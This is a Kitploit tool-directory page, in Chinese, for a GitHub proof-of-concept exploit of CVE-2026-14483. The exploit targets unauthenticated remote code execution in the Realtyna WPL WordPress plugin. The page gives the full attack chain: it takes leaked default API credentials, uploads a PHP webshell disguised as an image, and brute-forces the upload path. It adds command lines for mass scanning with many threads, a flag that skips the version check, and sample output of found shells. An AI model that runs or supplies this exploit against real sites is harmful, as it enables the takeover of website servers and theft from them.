Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS | Kitploit
工具/GitHubGitHub/madexploits/cve-2026-14483
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

查看仓库
118天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-14483 — WPL 房地产 RCE

针对 Realtyna WPL Real Estate Listing WordPress 插件的未认证远程代码执行。

字段详情
CVECVE-2026-14483
受影响版本<= 5.2.0
插件real-estate-listing-realtyna-wpl
影响未认证 PHP Webshell 上传 (RCE)
脚本CVE-2026-14483.py
作者MADEXPLOITS

默认情况下,脚本仅攻击运行 WPL 5.2.0 的目标。使用 --force 可覆盖此限制。

图片


漏洞概述

  1. 凭据泄露 — 默认的 api_key / api_secret 通过公开的 SQL 迁移转储文件暴露。
  2. 未认证上传 — 这些凭据可通过 WPL I/O API(set_property)进行认证,从而允许将精心构造的 PHP 文件作为房产图片上传。
  3. Webshell 发现 — 上传的 shell 位于 wp-content/uploads/WPL/{property_id}/ 目录下。

环境要求

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • 对目标的网络访问权限

使用方法

目标列表

创建一个文本文件,每行一个基础 URL:

root@kitploit:~
http://wplab.test
https://example.com

基本运行

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

成功获取的 shell URL 会追加到 result.txt(或 --output 指定的文件)。

完整选项

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force

利用流程

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

默认 shell 标记:MADEXPLOITS
默认远程文件名:0x89MADEXPLOITS.php


示例

单个实验室目标(本工作区):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

更高并发的大规模扫描:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

版本检查失败时强制利用:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

输出

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt 每行包含一个 shell URL。


注意事项

  • 版本信息从插件 readme.txt 中的 Stable tag: / Version: 读取,若未找到则回退到 wpl.php。
  • 如果上传后未找到 shell,请提高 --max-id。
  • 仅用于授权安全测试 / 本地实验室环境。
下载工具
参数默认值描述
--targets(必填)包含基础 URL 的文件(每行一个)
--outputresult.txt用于追加已找到 shell URL 的文件
--user-id1拥有新房产的 WordPress / WPL 用户 ID
--payload内置的上传 shell自定义 PHP Payload 字符串
--max-id1000定位 shell 时要暴力枚举的最大房产 ID
--timeout30HTTP 超时时间(秒)
--threads5并发工作线程数
--debug关闭详细的调试日志
--force关闭即使版本 ≠ 5.2.0 或无法检测版本也执行利用